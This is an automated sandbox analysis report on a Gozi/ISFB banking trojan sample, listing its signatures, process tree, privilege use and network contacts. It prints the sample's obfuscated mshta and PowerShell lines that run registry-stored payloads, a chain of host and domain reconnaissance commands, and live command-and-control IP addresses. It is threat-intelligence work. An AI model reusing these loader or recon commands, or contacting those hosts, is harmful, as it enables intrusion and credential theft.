Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-wgvqfseghj
Target de00c4750accf516704b8c0df265c24a
SHA256 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

Threat Level: Known bad

The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Runs net.exe

Suspicious use of FindShellTrayWindow

Gathers system information

Suspicious behavior: MapViewOfSection

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 17:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 17:54

Reported

2022-08-03 17:56

Platform

win7-20220715-en

Max time kernel

44s

Max time network

48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Network

N/A

Files

memory/1432-54-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

memory/1532-55-0x0000000000000000-mapping.dmp

memory/1532-56-0x0000000076031000-0x0000000076033000-memory.dmp

memory/1532-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1532-62-0x0000000000490000-0x000000000049D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 17:54

Reported

2022-08-03 17:56

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 368 set thread context of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 2228 set thread context of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 set thread context of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\net.exe | N/A
N/A | N/A | C:\Windows\system32\net.exe | N/A
N/A | N/A | C:\Windows\system32\net.exe | N/A

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 5068 wrote to memory of 3396 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 5068 wrote to memory of 3396 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 5068 wrote to memory of 3396 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1104 wrote to memory of 368 | N/A | C:\Windows\System32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 368 | N/A | C:\Windows\System32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 368 wrote to memory of 4084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 368 wrote to memory of 4084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4084 wrote to memory of 1064 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4084 wrote to memory of 1064 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 368 wrote to memory of 1228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 368 wrote to memory of 1228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1228 wrote to memory of 4548 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1228 wrote to memory of 4548 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 368 wrote to memory of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 368 wrote to memory of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 2228 wrote to memory of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 2228 wrote to memory of 2028 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2028 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2028 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2028 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2028 wrote to memory of 4648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\more.com
PID 2028 wrote to memory of 4648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\more.com
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe
PID 2228 wrote to memory of 4524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4496 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 4496 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 4496 wrote to memory of 3512 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 4496 wrote to memory of 3512 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 2228 wrote to memory of 632 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 632 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 5076 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 5076 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3936 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 5076 wrote to memory of 3936 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2228 wrote to memory of 3564 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 3564 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 1960 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 1960 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 1960 wrote to memory of 4004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\nslookup.exe
PID 1960 wrote to memory of 4004 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\nslookup.exe
PID 2228 wrote to memory of 1968 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"

Network

Country | Destination | Domain | Proto
US | 13.107.42.16:80 | config.edge.skype.com | tcp
RO | 37.120.206.71:80 | 37.120.206.71 | tcp
RU | 5.42.199.72:80 | 5.42.199.72 | tcp
RO | 37.120.206.91:80 | 37.120.206.91 | tcp
IE | 20.190.159.23:443 | | tcp
DE | 185.212.47.98:8080 | | tcp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp
NL | 13.69.109.131:443 | | tcp

Files

